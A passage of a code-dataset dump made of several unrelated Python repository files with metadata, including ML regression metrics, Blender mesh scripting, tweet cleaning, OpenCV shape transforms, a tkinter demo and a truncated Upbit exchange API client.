pol_reg.predict(poly_reg.fit_transform(x_test))\r\nprint(\"Polynomial Regression:\")\r\nprint(\"R2 Score:\",r2_score(y_test,b))\r\nprint(\"Root Mean Sqaure:\",np.sqrt(mean_squared_error(y_test,b)))\r\nprint(\"Explained Variance Score:\",explained_variance_score(y_test,b))\r\nprint(\"Max Error:\",max_error(y_test,b))\r\nprint(\"Mean Gamma Devience:\",mean_gamma_deviance(y_test,b))\r\nprint(\"---------------------------------------------------------------------\")\r\nprint(\" \")\r\n\r\n\r\n\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nregres = RandomForestRegressor(min_samples_split=75,min_samples_leaf=10)\r\nhell = regres.fit(x_train,y_train)\r\nc = regres.predict(x_test)\r\nprint(\"Random Forest Regression:\")\r\nprint(\"R2 Score:\",r2_score(y_test,c))\r\nprint(\"Root Mean Sqaure:\",np.sqrt(mean_squared_error(y_test,c)))\r\nprint(\"Explained Variance Score:\",explained_variance_score(y_test,c))\r\nprint(\"Max Error:\",max_error(y_test,c))\r\nprint(\"Mean Gamma Devience:\",mean_gamma_deviance(y_test,c))\r\nprint(\"---------------------------------------------------------------------\")\r\nprint(\" \")\r\n\r\n\r\nfrom sklearn.linear_model import Lasso\r\nlasso_reg = Lasso(normalize=True)\r\nlasso_reg.fit(x_train,y_train)\r\nd = lasso_reg.predict(x_test)\r\nprint(\"Lasso Regression:\")\r\nprint(\"R2 Score:\",r2_score(y_test,d))\r\nprint(\"Root Mean Sqaure:\",np.sqrt(mean_squared_error(y_test,d)))\r\nprint(\"Explained Variance Score:\",explained_variance_score(y_test,d))\r\nprint(\"Max Error:\",max_error(y_test,d))\r\nprint(\"Mean Gamma Devience:\",mean_gamma_deviance(y_test,d))\r\nprint(\"---------------------------------------------------------------------\")\r\nprint(\" \")\r\n\r\n\r\nimport scipy.stats as stats\r\nimport math\r\nsample = np.random.choice(a=y_pred,size = 11)\r\nsample_mean = sample.mean()\r\nz_critical = stats.norm.ppf(q = 0.95)\r\npop_stdev = y_pred.std()\r\nmargin_of_error = z_critical * (pop_stdev/math.sqrt(250))\r\nconfidence_interval = (sample_mean - margin_of_error,sample_mean +\r\nmargin_of_error)\r\nprint(\"Confidence interval:\",end=\" \")\r\nprint(confidence_interval)","repo_name":"Karthivasanth/Ground_water_Quality_prediction","sub_path":"exp6 and 7.py","file_name":"exp6 and 7.py","file_ext":"py","file_size_in_byte":9245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"19951938126","text":"import bpy\nimport mathutils\nimport bmesh\nimport numpy as np\nimport json\n\ndef bmesh_copy_from_object(obj, transform=True, triangulate=True, apply_modifiers=True):\n assert(obj.type == 'MESH')\n\n if apply_modifiers and obj.modifiers:\n me = obj.to_mesh(bpy.context.scene, True, 'PREVIEW', calc_tessface=False)\n bm = bmesh.new()\n bm.from_mesh(me)\n bpy.data.meshes.remove(me)\n else:\n me = obj.data\n if obj.mode == 'EDIT':\n bm_orig = bmesh.from_edit_mesh(me)\n bm = bm_orig.copy()\n else:\n bm = bmesh.new()\n bm.from_mesh(me)\n\n # Remove custom data layers to save memory\n for elem in (bm.faces, bm.edges, bm.verts, bm.loops):\n for layers_name in dir(elem.layers):\n if not layers_name.startswith(\"_\"):\n layers = getattr(elem.layers, layers_name)\n for layer_name, layer in layers.items():\n layers.remove(layer)\n\n if transform:\n bm.transform(obj.matrix_world)\n\n if triangulate:\n bmesh.ops.triangulate(bm, faces=bm.faces)\n\n return bm\n\ndef get_verts_in_group(obj, group_name):\n vg_idx = obj.vertex_groups[group_name].index\n vs = [ v for v in obj.data.vertices if vg_idx in [ vg.group for vg in v.groups ] ]\n return vs\n\ndef get_bmesh_verts(bmesh, group_vertices):\n bmesh.verts.ensure_lookup_table()\n\n bmesh_verts = []\n\n for i in range(len(group_vertices)):\n bmesh_verts.append(bmesh.verts[group_vertices[i].index])\n\n return bmesh_verts\n\ndef calculate_distance(inner, outer, group = '', range = False):\n bpy.context.scene.update()\n\n inner_bm, inner_tree = get_bmesh_and_tree(inner)\n outer_bm, outer_tree = get_bmesh_and_tree(outer)\n\n if group == '':\n bmesh_verts = get_bmesh_verts(outer_bm, outer.data.vertices)\n else:\n group_verts = get_verts_in_group(outer, group)\n bmesh_verts = get_bmesh_verts(outer_bm, group_verts)\n\n distances = []\n\n for v in bmesh_verts:\n loc, norm, index, dist = inner_tree.find_nearest(v.co)\n distances.append(dist)\n\n if range:\n return max(distances)\n else:\n return sum(distances)\n\ndef get_bmesh_and_tree(object):\n object_bmesh = bmesh_copy_from_object(object)\n\n object_tree = mathutils.bvhtree.BVHTree.FromBMesh(object_bmesh)\n\n return object_bmesh, object_tree\n\ndef select_objects():\n inner = bpy.context.object\n outer = (ob for ob in bpy.context.selected_objects if ob != inner).__next__()\n\n return inner, outer\n\ndef random_bone_movement(armature, bone_name, factor = 0.01):\n bone = armature.pose.bones[bone_name]\n\n bone.location.z += factor * (np.random.uniform() - .5)\n bone.location.y += factor * (np.random.uniform() - .5)\n bone.location.x += factor * (np.random.uniform() - .5)\n\ndef get_bone_locs(armature, bone_name):\n bone = armature.pose.bones[bone_name]\n return bone.location.x, bone.location.y, bone.location.z\n\ndef get_default_positions(armature, bone_list):\n default_position = {}\n for bone in bone_list:\n x = armature.pose.bones[bone].location.x\n y = armature.pose.bones[bone].location.y\n z = armature.pose.bones[bone].location.z\n vector = mathutils.Vector((x,y,z))\n default_position[bone] = vector\n return default_position\n\ndef reset_positions(armature, default_position):\n for bone in default_position:\n armature.pose.bones[bone].location = default_position[bone]\n\ndef collect_bone_data(armature, bone_name, factor, inner, outer, subdiv, axis):\n bone = armature.pose.bones[bone_name]\n\n axis_no = -1\n\n if axis == 'x':\n axis_no = 0\n elif axis == 'y':\n axis_no = 1\n elif axis == 'z':\n axis_no = 2\n\n distances = []\n\n default_loc = bone.location[axis_no]\n\n distances.append([bone.location[axis_no], calculate_distance(inner, outer, 'raycast2')])\n\n movement_amount = factor/subdiv\n\n for i in range(subdiv):\n bone.location[axis_no] += ((i+1) * movement_amount)\n distances.append([bone.location[axis_no], calculate_distance(inner, outer, 'raycast2')])\n\n bone.location[axis_no] = default_loc\n\n bone.location[axis_no] -= ((i+1) * movement_amount)\n distances.append([bone.location[axis_no], calculate_distance(inner, outer, 'raycast2')])\n\n bone.location[axis_no] = default_loc\n\n return distances\n\ndef get_mesh_data(object):\n \"\"\"We want lists of the vertices and their positions; the edges formed from\n each vertex; the faces formed by each vertex\"\"\"\n bmesh, tree = get_bmesh_and_tree(object)\n bmesh_verts = get_bmesh_verts(bmesh, object.data.vertices)\n\n mesh_data_dictionary = {'Vertices': [],\n 'Edges': [],\n 'Faces': []}\n\n for v in bmesh_verts:\n coordinates = (v.co.x, v.co.y, v.co.z)\n mesh_data_dictionary['Vertices'].append((v.index, coordinates))\n\n for e in object.data.edges:\n vertices_in_edge = []\n for v in e.vertices:\n vertices_in_edge.append(v)\n mesh_data_dictionary['Edges'].append(tuple(vertices_in_edge))\n\n for f in object.data.polygons:\n vertices_in_face = []\n for v in f.vertices:\n vertices_in_face.append(v)\n mesh_data_dictionary['Faces'].append(tuple(vertices_in_face))\n\n return mesh_data_dictionary\n\ndef get_weights(ob, group_name):\n group_index = ob.vertex_groups[group_name].index\n for i, v in enumerate(ob.data.vertices):\n for g in v.groups:\n if g.group == group_index:\n yield (i, g.weight)\n break\n\ndef get_weights_for_vxs_in_group(obj, group_name):\n bmesh, tree = get_bmesh_and_tree(obj)\n vx = get_verts_in_group(obj, group_name)\n bvx = get_bmesh_verts(bmesh, vx)\n\n all_weights = get_weights(obj, group_name)\n included_idx = []\n for v in bvx:\n included_idx.append(v.index)\n\n group_weights =[]\n\n for i, w in enumerate(all_weights):\n if w[0] in included_idx:\n group_weights.append(w)\n\n return group_weights\n\ndef matrix_world(armature_ob, bone_name):\n local = armature_ob.data.bones[bone_name].matrix_local\n basis = armature_ob.pose.bones[bone_name].matrix_basis\n\n parent = armature_ob.pose.bones[bone_name].parent\n if parent == None:\n return local * basis\n else:\n parent_local = armature_ob.data.bones[parent.name].matrix_local\n return matrix_world(armature_ob, parent.name) * (parent_local.inverted() * local) * basis\n\ndatapoints = 10\narmature = bpy.data.objects[\"Armature.001\"]\n\ndata_set = []\n\n\"\"\"default = get_default_positions(armature, list_of_bones)\n\nwith open('data.txt', 'w') as f:\n for item in data_set:\n f.write(\"%s\\n\" % item)\"\"\"\n\n\nbody = bpy.data.objects['24_body_0.9_1_1.001']\nthighhighs = bpy.data.objects['24_tights_0.6_1_1.001']\nshoes = bpy.data.objects['24_shoes_0.7_1_1.001']\nsuit = bpy.data.objects['24_suit_0.4_1_1.001']\ntie = bpy.data.objects['24_necktief_0.5_1_1.001']\ncollar = bpy.data.objects['24_collarf_0.6_1_1.001']\nface = bpy.data.objects['24_face_0.9_1_1.001']\nlips = bpy.data.objects['24_lips_0.4_1_1.001']\nteeth = bpy.data.objects['24_teeth_0.9_1_1.001']\nhair_front = bpy.data.objects['25_fronthair_0.4_1_1.001']\nhair_back = bpy.data.objects['25_backhair1_0.4_1_1']\nhair_back2 = bpy.data.objects['25_backhair2_0.4_1_1']\nhair_back3 = bpy.data.objects['25_backhair3_0.4_1_1']\nhair_base = bpy.data.objects['25_Hairbase_0.4_1_1']\neyeballs = bpy.data.objects['24_eyesballs_0.4_1_1.001']\niris = bpy.data.objects['24_eyes_0.8_1_1.001']\n\nmesh_objects = [body, thighhighs, shoes, suit, tie, collar, face,\nlips, teeth, hair_front, hair_back, hair_back2, hair_back3, hair_base,\neyeballs, iris]\n\nvertex_coordinates = []\nbone_coordinates = []\n\ntest_bone = armature.pose.bones[\"head lip upper middle\"]\n\ntest_bone.location = mathutils.Vector((0,0,0))\n\nbpy.context.scene.update()\n\nbm, tree = get_bmesh_and_tree(lips)\n\nvx = get_verts_in_group(lips, \"head lip upper middle\")\n\nbvx = get_bmesh_verts(bm, vx)\n\nbone_coordinates.append(tuple(test_bone.location))\nvertex_coordinates.append(tuple(bvx[0].co))\n\nfor i in range(10000):\n print(i)\n\n test_bone.location.x = (np.random.uniform() - 0.5) * 0.1\n test_bone.location.y = (np.random.uniform() - 0.5) * 0.1\n test_bone.location.z = (np.random.uniform() - 0.5) * 0.1\n\n bpy.context.scene.update()\n bm, tree = get_bmesh_and_tree(lips)\n\n vx = get_verts_in_group(lips, \"head lip upper middle\")\n\n bvx = get_bmesh_verts(bm, vx)\n\n bone_coordinates.append(tuple(test_bone.location))\n vertex_coordinates.append(tuple(bvx[0].co))\n\nbone_test_data = {'v': vertex_coordinates, 'b': bone_coordinates}\n\nwith open(\"bone_test_data.json\", \"w\") as w:\n json.dump(bone_test_data, w)\n\n\"\"\"x,y,z = get_bone_locs(armature, \"head lip upper middle\")\n\nbone_loc = (x,y,z)\n\nprint(\"Bone Location: \" + str(bone_loc))\n\n\n\nfor w in get_weights_for_vxs_in_group(lips, \"head lip upper middle\"):\n if w[0] == bvx[0].index:\n print(w)\"\"\"\n","repo_name":"chicks427/blender","sub_path":"get_mesh_data.py","file_name":"get_mesh_data.py","file_ext":"py","file_size_in_byte":8981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"25991733159","text":"#==========================================\n# Title: Clean and format raw tweets using regex\n# Author: Rajesh Gupta\n# Date: 2 Oct 2018\n#==========================================\n\nimport csv, re\nfrom math import log2\nimport logging\nfrom global_vars import *\n\nclass CleanTwitterData():\n\t\n\tdef __init__(self):\n\t\tprint(\"Cleaning the tweets to retain only textual content\")\n\t\tself.compile_regex_patterns()\n\t\t\n\tdef compile_regex_patterns(self):\n\t\tself.cleaning_patterns = {\n\t\t\t\"removes_username\" : (re.compile(r'@\\w+'),' '), #removes user names from tweet\n\t\t\t\"remove_urls\":(re.compile(r'https?://\\S*'),''), #removes urls\n\t\t\t\"remove_rt\": (re.compile(r'\\brt\\b|\\.'),''), #removes retweets and fullstops\n\t\t\t\"remove_single_char\": (re.compile(r'\\s[a-z]\\s'),' '), #removes single alphabets a-z\n\t\t\t\"sub_nt_with_not\": (re.compile(r'n\\'t'),' not'), #removes n't with not\n\t\t\t\"removes_special_char\": (re.compile(r'[\\:\\(\\)\\[\\]$#-]'),' '), #removes emojis and special characters\n\t\t\t\"remove_all_but_alpha\": (re.compile(r'[^a-z\\d\\s]'),' '), #removes everything except alphabets, digits and spaces\n\t\t\t\"remove_extra_whitespaces\":(re.compile(r'\\s+'),' '), #removes additional whitespaces\n\t\t}\n\t\t\t\n\tdef clean_with_regex(self, unclean_tweets):\n\t\tlogging.info(\"Cleaning twitter data....\")\n\t\tclean_tweets = []\n\t\tfor tweet in unclean_tweets:\n\t\t\ttweet = tweet.lower() #converting all alphabets to lowercase\n\t\t\tfor remove_key, pattern in self.cleaning_patterns.items():\n\t\t\t\ttweet=pattern[0].sub(pattern[1],tweet)\n\t\t\tclean_tweets.append(tweet.strip())\n\t\treturn clean_tweets","repo_name":"rajesh-gupta-14/LookAlike_Model_B2B_Customers_NLP","sub_path":"src/clean_twitter_data.py","file_name":"clean_twitter_data.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"39"} +{"seq_id":"25865459119","text":"from math import exp, sin, cos, pi\nimport numpy as np \n\ndef alpha(nu, t):\n Uref = 1\n Lx = 1\n Ly = 1\n return Uref * exp(-4 * (pi**2) * nu * t * (1.0 / Lx ** 2 + 1.0 / Ly ** 2))\n\ndef velocity(coord, alpha):\n vel = np.zeros(coord.shape)\n Lx= 1\n Ly= 1\n x_ = 2 * pi * coord[:,0] / Lx\n y_ = 2 * pi * coord[:,1] / Ly\n vel[:,0] = np.cos(x_) * np.sin(y_) *Lx* alpha \n vel[:,1] = -np.sin(x_) * np.cos(y_) *Ly *alpha \n vel[:,2] = 0\n return vel.flatten()\n\ndef vorticity(coord, alpha):\n vort = np.zeros(coord.shape)\n Lx, Ly= (1, 1)\n x_ = 2 * pi * coord[:,0] / Lx\n y_ = 2 * pi * coord[:,1] / Ly\n vort[:,0] = 0\n vort[:,1] = 0 \n vort[:,2] = -2 * pi * (Ly / Lx + Lx / Ly) * np.cos(x_) * np.cos(y_) * alpha \n return vort.flatten()","repo_name":"maiterm/Pynama","sub_path":"src/functions/taylor_green_3d.py","file_name":"taylor_green_3d.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"15945809736","text":"import cv2 as cv\nimport numpy as np\n\ndef menu():\n while True:\n print(\"Menu:\")\n print(\"1. Create a white background\")\n print(\"2. Draw rectangle\")\n print(\"3. Translation transformation\")\n print(\"4. Rotation transformation\")\n print(\"5. Scaling transformation\")\n print(\"6. Exit\")\n print(\"Please select an function:\", end = '')\n try:\n choice = int(input())\n if 0 < choice < 7 :\n return choice\n else:\n print(\"Invalid choice\")\n except:\n print(\"Invalid choice\")\n\ndef init_window(name, bg = (0,0,0),width = 600, height = 800):\n cv.namedWindow(name, cv.WINDOW_NORMAL)\n cv.imshow(name, bg)\n\ndef refresh_window():\n global name, bg, rect_coor\n #cv.destroyWindow(frame)\n bg = np.ones((600, 800, 3), np.uint8) * 255\n if rect_coor[0][0] != -1:\n pts = np.array(rect_coor)\n cv.fillPoly(bg, pts = [pts], color=(0, 255, 0))\n cv.imshow(name,bg)\n\ndef white():\n global name, bg, rect_coor\n bg = np.ones((600,800,3), np.uint8)*255\n rect_coor = [[-1,-1],\n [-1,-1],\n [-1,-1],\n [-1,-1]]\n cv.imshow(name, bg)\n\ndef draw_rect(event,x,y,flags,param):\n global rect_coor,bg, draw, rect_coor\n if(event == cv.EVENT_LBUTTONDOWN):\n bg = np.ones((600, 800, 3), np.uint8)*255\n bg = cv.putText(bg, \"Enter to confirm\", (488, 561), cv.FONT_HERSHEY_PLAIN, 1.5, (255, 0, 0), 2, cv.LINE_AA)\n draw = True\n rect_coor[0] = x,y\n elif (event == cv.EVENT_MOUSEMOVE):\n if draw == True:\n bg = np.ones((600, 800, 3), np.uint8) * 255\n bg = cv.putText(bg, \"Enter to confirm\", (488, 561), cv.FONT_HERSHEY_PLAIN, 1.5, (255, 0, 0), 2, cv.LINE_AA)\n cv.rectangle(bg,rect_coor[0],(x,y),(0,255,0),-1)\n elif(event == cv.EVENT_LBUTTONUP):\n draw = False\n rect_coor[2] = x,y\n bg = np.ones((600, 800, 3), np.uint8) * 255\n bg = cv.putText(bg, \"Enter to confirm\", (488, 561), cv.FONT_HERSHEY_PLAIN, 1.5, (255, 0, 0), 2, cv.LINE_AA)\n cv.rectangle(bg,rect_coor[0],rect_coor[2],(0,255,0),-1)\n print(rect_coor)\n\ndef rectangle():\n global name,bg\n cv.setMouseCallback(name, draw_rect)\n while True:\n text = True\n bg = cv.putText(bg, \"Enter to confirm\", (488, 561), cv.FONT_HERSHEY_PLAIN, 1.5, (255, 0, 0), 2, cv.LINE_AA)\n cv.imshow(name,bg)\n k = cv.waitKey(1) & 0xFF\n if k == ord('\\r'):\n calc_rect()\n break\n\ndef translation():\n global rect_coor\n if rect_coor[0][0] == -1:\n print(\"Please draw a rectangle first\")\n return\n tx = int(input(\"Enter tx: \"))\n ty = int(input(\"Enter ty: \"))\n (x1,y1),(x2,y2),(x3,y3),(x4,y4) = rect_coor\n x1 += tx\n x2 += tx\n x3 += tx\n x4 += tx\n y1 += ty\n y2 += ty\n y3 += ty\n y4 += ty\n rect_coor = [[x1,y1],[x2,y2],[x3,y3],[x4,y4]]\n\ndef rotation():\n global rect_coor\n if rect_coor[0][0] == -1:\n print(\"Please draw a rectangle first\")\n return\n (x1,y1),(x2,y2),(x3,y3),(x4,y4) = rect_coor\n angle = np.radians(int(input(\"Enter angle: \")))\n center = [int((x1 + x3) / 2), int((y1 + y3) / 2)]\n rot = [[np.cos(angle), np.sin(angle)],\n [-np.sin(angle), np.cos(angle)]]\n vector = [[x1-center[0],y1-center[1]],\n [x2-center[0],y2-center[1]],\n [x3-center[0],y3-center[1]],\n [x4-center[0],y4-center[1]]]\n print(vector)\n rot_v = [[vector[0][0]*rot[0][0]+vector[0][1]*rot[0][1],vector[0][0]*rot[1][0]+vector[0][1]*rot[1][1]],\n [vector[1][0]*rot[0][0]+vector[1][1]*rot[0][1],vector[1][0]*rot[1][0]+vector[1][1]*rot[1][1]],\n [vector[2][0]*rot[0][0]+vector[2][1]*rot[0][1],vector[2][0]*rot[1][0]+vector[2][1]*rot[1][1]],\n [vector[3][0]*rot[0][0]+vector[3][1]*rot[0][1],vector[3][0]*rot[1][0]+vector[3][1]*rot[1][1]]]\n print(rot_v)\n print(rect_coor)\n rect_coor = [[int(rot_v[0][0]+center[0]),int(rot_v[0][1]+center[1])],\n [int(rot_v[1][0]+center[0]),int(rot_v[1][1]+center[1])],\n [int(rot_v[2][0]+center[0]),int(rot_v[2][1]+center[1])],\n [int(rot_v[3][0]+center[0]),int(rot_v[3][1]+center[1])]]\n print(rect_coor)\n\ndef scaling():\n global rect_coor\n if rect_coor[0][0] == -1:\n print(\"Please draw a rectangle first\")\n return\n sx = float(input(\"Enter sx: \"))\n sy = float(input(\"Enter sy: \"))\n (x1,y1),(x2,y2),(x3,y3),(x4,y4) = rect_coor\n center = [int((x1+x3)/2), int((y1+y3)/2)]\n rect_coor = [[int((x1-center[0])*sx+center[0]), int((y1-center[1])*sy+center[1])],\n [int((x2-center[0])*sx+center[0]), int((y2-center[1])*sy+center[1])],\n [int((x3-center[0])*sx+center[0]), int((y3-center[1])*sy+center[1])],\n [int((x4-center[0])*sx+center[0]), int((y4-center[1])*sy+center[1])]]\n\ndef calc_rect():\n global rect_coor\n pts = rect_coor\n rect_coor= [pts[0],\n [pts[0][0], pts[2][1]],\n pts[2],\n [pts[2][0], pts[0][1]]]\n print(rect_coor)\n\ndef main():\n global name, bg\n init_window(name)\n cv.waitKey(1)\n while True:\n refresh_window()\n cv.waitKey(10)\n choice = menu()\n if choice == 1:\n white()\n elif choice == 2:\n rectangle()\n elif choice == 3:\n translation()\n elif choice == 4:\n rotation()\n elif choice == 5:\n scaling()\n elif choice == 6:\n cv.destroyAllWindows()\n break\n cv.waitKey(1)\n\nname = \"Lab1\"\nbg = np.zeros((600,800,3), np.uint8)\nrect_coor = [[-1,-1],\n [-1,-1],\n [-1,-1],\n [-1,-1]]\ndraw = False\nmain()","repo_name":"HaleFPT/CPVFPT_git","sub_path":"CPV-github/Lab tren lop/CPV301 - Group 1 - Lab1.py","file_name":"CPV301 - Group 1 - Lab1.py","file_ext":"py","file_size_in_byte":5826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"41120064601","text":"import tkinter as tk\n\n\nclass NewApp:\n def __init__(self, arg_Text):\n self.root = tk.Tk()\n self.root.title(\"AwesomeApp3000\")\n #\n # self.w = tk.Label(\n # self.root, text=arg_Text, height=20, width=20, bg=\"gray\", fg=\"black\"\n # )\n # self.w.pack()\n #\n # self.Box2 = tk.Label(\n # self.root,\n # text=\"Hi I am Box 2\",\n # height=10,\n # width=15,\n # bg=\"green\",\n # fg=\"light salmon\",\n # )\n # self.Box2.pack(side=\"right\")\n #\n # self.Box3 = tk.Label(\n # self.root,\n # text=\"Hi I am Box 3\",\n # height=15,\n # width=20,\n # bg=\"MediumPurple1\",\n # fg=\"thistle3\",\n # )\n # self.Box3.pack()\n self.NrClick = 0\n self.ButCount = tk.Label(self.root, text=\"You didn't click yet!\")\n self.ButCount.pack()\n self.ClickerButton = tk.Button(\n self.root, text=\"Rise the number by one\", command=lambda: plusOne(self)\n )\n self.ClickerButton.pack()\n\n def plusOne(self):\n self.NrClick += 1\n self.ButCount.config(text=self.NrClick)\n\n # self.Button1 = tk.Button(\n # self.root,\n # text=\"Add up\",\n # command=lambda: adding(self),\n # height=10,\n # width=20,\n # fg=\"yellow\",\n # bg=\"black\",\n # activeforeground=\"black\",\n # activebackground=\"gray\",\n # )\n # self.Button1.pack()\n # self.input1 = tk.StringVar()\n # self.input2 = tk.StringVar()\n # self.edit1 = tk.Entry(self.root, textvariable=self.input1)\n # self.edit2 = tk.Entry(self.root, textvariable=self.input2)\n # self.edit1.pack()\n # self.edit2.pack()\n self.root.mainloop()\n\n\n# def adding(self):\n# number1 = self.input1.get()\n# number2 = self.input2.get()\n# sum = float(number1) + float(number2)\n# print(sum)\n# self.w.config(text=str(sum))\n\n\nNewApp(\"What a mess\")\n","repo_name":"FPirzer/Assay-CQ-ABI-2022","sub_path":"AppExercises/NewAppStart.py","file_name":"NewAppStart.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"34479920651","text":"# This class will contain the decision algorithm that attributes 'credibility' weights to odometry and wifi-distance\nimport math\n\n\n\ndef checkOutliers(odoVal, wifiVal, thresholdPerc):\n outliers = 0\n if (abs(1-(wifiVal/(odoVal))) > thresholdPerc):\n outliers = 1\n else:\n outliers = 0\n return outliers\n\ndef getPosition(odoVal, wifiVal, outliers):\n if(outliers == 1):\n newposition = odoVal\n else:\n newposition = .5*(odoVal) + .5*wifiVal\n\n return newposition ","repo_name":"pizzajoy/Robby","sub_path":"DynamicWeightAllocation.py","file_name":"DynamicWeightAllocation.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"3842986106","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 6 15:37:07 2020\n\n@author: aoust\n\"\"\"\n\nimport numpy as np\nimport math\n\nclass QuadraticPolynomial():\n \n def __init__(self,n,tuples, coefs):\n \n self.n = n\n assert(len(tuples)==len(coefs))\n self.tuples = tuples\n self.coefs = coefs\n for (i,j) in tuples:\n assert(i<=j)\n \n def check(self):\n for (i,j) in self.tuples:\n \n assert(i<=j)\n \n if type(self.coefs)==list:\n self.coefs = np.array(self.coefs) \n \n def vpairs(self):\n \n for (i,j) in self.tuples:\n if ((i>=0) and (i= 2000000:\n tick_size = func(price / 1000) * 1000\n elif price >= 1000000:\n tick_size = func(price / 500) * 500\n elif price >= 500000:\n tick_size = func(price / 100) * 100\n elif price >= 100000:\n tick_size = func(price / 50) * 50\n elif price >= 10000:\n tick_size = func(price / 10) * 10\n elif price >= 1000:\n tick_size = func(price / 5) * 5\n elif price >= 100:\n tick_size = func(price / 1) * 1\n elif price >= 10:\n tick_size = func(price / 0.1) / 10\n else:\n tick_size = func(price / 0.01) / 100\n\n return tick_size\n\n\nclass UPBIT:\n def __init__(self, access, secret):\n self.access = access\n self.secret = secret\n\n\n def _request_headers(self, query=None):\n payload = {\n \"access_key\": self.access,\n \"nonce\": str(uuid.uuid4())\n }\n\n if query is not None:\n m = hashlib.sha512()\n m.update(urlencode(query, doseq=True).replace(\"%5B%5D=\", \"[]=\").encode())\n query_hash = m.hexdigest()\n payload['query_hash'] = query_hash\n payload['query_hash_alg'] = \"SHA512\"\n\n #jwt_token = jwt.encode(payload, self.secret, algorithm=\"HS256\").decode('utf-8')\n jwt_token = jwt.encode(payload, self.secret, algorithm=\"HS256\") # PyJWT >= 2.0\n authorization_token = 'Bearer {}'.format(jwt_token)\n headers = {\"Authorization\": authorization_token}\n return headers\n\n\n #--------------------------------------------------------------------------\n # 자산 \n #--------------------------------------------------------------------------\n # 전체 계좌 조회\n def get_balances(self, contain_req=False):\n \"\"\"\n 전체 계좌 조회\n :param contain_req: Remaining-Req 포함여부\n :return: 내가 보유한 자산 리스트\n [contain_req == True 일 경우 Remaining-Req가 포함]\n \"\"\"\n url = \"https://api.upbit.com/v1/accounts\"\n headers = self._request_headers()\n result = req._send_get_request(url, headers=headers)\n if contain_req:\n return result\n else:\n return result[0]\n\n\n def get_balance(self, ticker=\"KRW\", contain_req=False):\n \"\"\"\n 특정 코인/원화의 잔고를 조회하는 메소드\n :param ticker: 화폐를 의미하는 영문 대문자 코드\n :param contain_req: Remaining-Req 포함여부\n :return: 주문가능 금액/수량 (주문 중 묶여있는 금액/수량 제외)\n [contain_req == True 일 경우 Remaining-Req가 포함]\n \"\"\"\n try:\n # fiat-ticker\n # KRW-BTC\n if '-' in ticker:\n ticker = ticker.split('-')[1]\n\n balances, req = self.get_balances(contain_req=True)\n\n # search the current currency\n balance = 0\n for x in balances:\n if x['currency'] == ticker:\n balance = float(x['balance'])\n break\n\n if contain_req:\n return balance, req\n else:\n return balance\n except Exception as x:\n print(x.__class__.__name__)\n return None\n\n def get_balance_t(self, ticker='KRW', contain_req=False):\n \"\"\"\n 특정 코인/원화의 잔고 조회(balance + locked)\n :param ticker: 화폐를 의미하는 영문 대문자 코드\n :param contain_req: Remaining-Req 포함여부\n :return: 주문가능 금액/수량 (주문 중 묶여있는 금액/수량 포함)\n [contain_req == True 일 경우 Remaining-Req가 포함]\n \"\"\"\n try:\n # KRW-BTC\n if '-' in ticker:\n ticker = ticker.split('-')[1]\n\n balances, req = self.get_balances(contain_req=True)\n\n balance = 0\n locked = 0\n for x in balances:\n if x['currency'] == ticker:\n balance = float(x['balance'])\n locked = float(x['locked'])\n break\n\n if contain_req:\n return balance + locked, req\n else:\n return balance + locked\n except Exception as x:\n print(x.__class__.__name__)\n return None\n\n def get_avg_buy_price(self, ticker='KRW', contain_req=False):\n \"\"\"\n 특정 코인/원화의 매수평균가 조회\n :param ticker: 화폐를 의미하는 영문 대문자 코드\n :param contain_req: Remaining-Req 포함여부\n :return: 매수평균가\n [contain_req == True 일 경우 Remaining-Req가 포함]\n \"\"\"\n try:\n # KRW-BTC\n if '-' in ticker:\n ticker = ticker.split('-')[1]\n\n balances, req = self.get_balances(contain_req=True)\n\n avg_buy_price = 0\n for x in balances:\n if x['currency'] == ticker:\n avg_buy_price = float(x['avg_buy_price'])\n break\n if contain_req:\n return avg_buy_price, req\n else:\n return avg_buy_price\n\n except Exception as x:\n print(x.__class__.__name__)\n return None\n\n def get_amount(self, ticker, contain_req=False):\n \"\"\"\n 특정 코인/원화의 매수금액 조회\n :param ticker: 화폐를 의미하는 영문 대문자 코드 (ALL 입력시 총 매수금액 조회)\n :param contain_req: Remaining-Req 포함여부\n :return: 매수금액\n [contain_req == True 일 경우 Remaining-Req가 포함]\n \"\"\"\n try:\n # KRW-BTC\n if '-' in ticker:\n ticker = ticker.split('-')[1]\n\n balances, req = self.get_balances(contain_req=True)\n\n amount = 0\n for x in balances:\n if x['currency'] == 'KRW':\n continue\n\n avg_buy_price = float(x['avg_buy_price'])\n balance = float(x['balance'])\n locked = float(x['locked'])\n\n if ticker == 'ALL':\n amount += avg_buy_price * (balance + locked)\n elif x['currency'] == ticker:\n amount = avg_buy_price * (balance + locked)\n break\n if contain_req:\n return amount, req\n else:\n return amount\n except Exception as x:\n print(x.__class__.__name__)\n return None\n\n # endregion balance\n\n\n #--------------------------------------------------------------------------\n # 주문 \n #--------------------------------------------------------------------------\n # 주문 가능 정보\n def get_chance(self, ticker, contain_req=False):\n \"\"\"\n 마켓별 주문 가능 정보를 확인.\n :param ticker:\n :param contain_req: Remaining-Req 포함여부\n :return: 마켓별 주문 가능 정보를 확인\n [contain_req == True 일 경우 Remaining-Req가 포함]\n \"\"\"\n try:\n url = \"https://api.upbit.com/v1/orders/chance\"\n data = {\"market\": ticker}\n headers = self._request_headers(data)\n result = req._send_get_request(url, headers=headers, data=data)\n if contain_req:\n return result\n else:\n return result[0]\n except Exception as x:\n print(x.__class__.__name__)\n return None\n \n\n # 개별 주문 조회 \n def get_order(self, ticker_or_uuid, state='wait', kind='normal', contain_req=False):\n \"\"\"\n 주문 리스트 조회\n :param ticker: market\n :param state: 주문 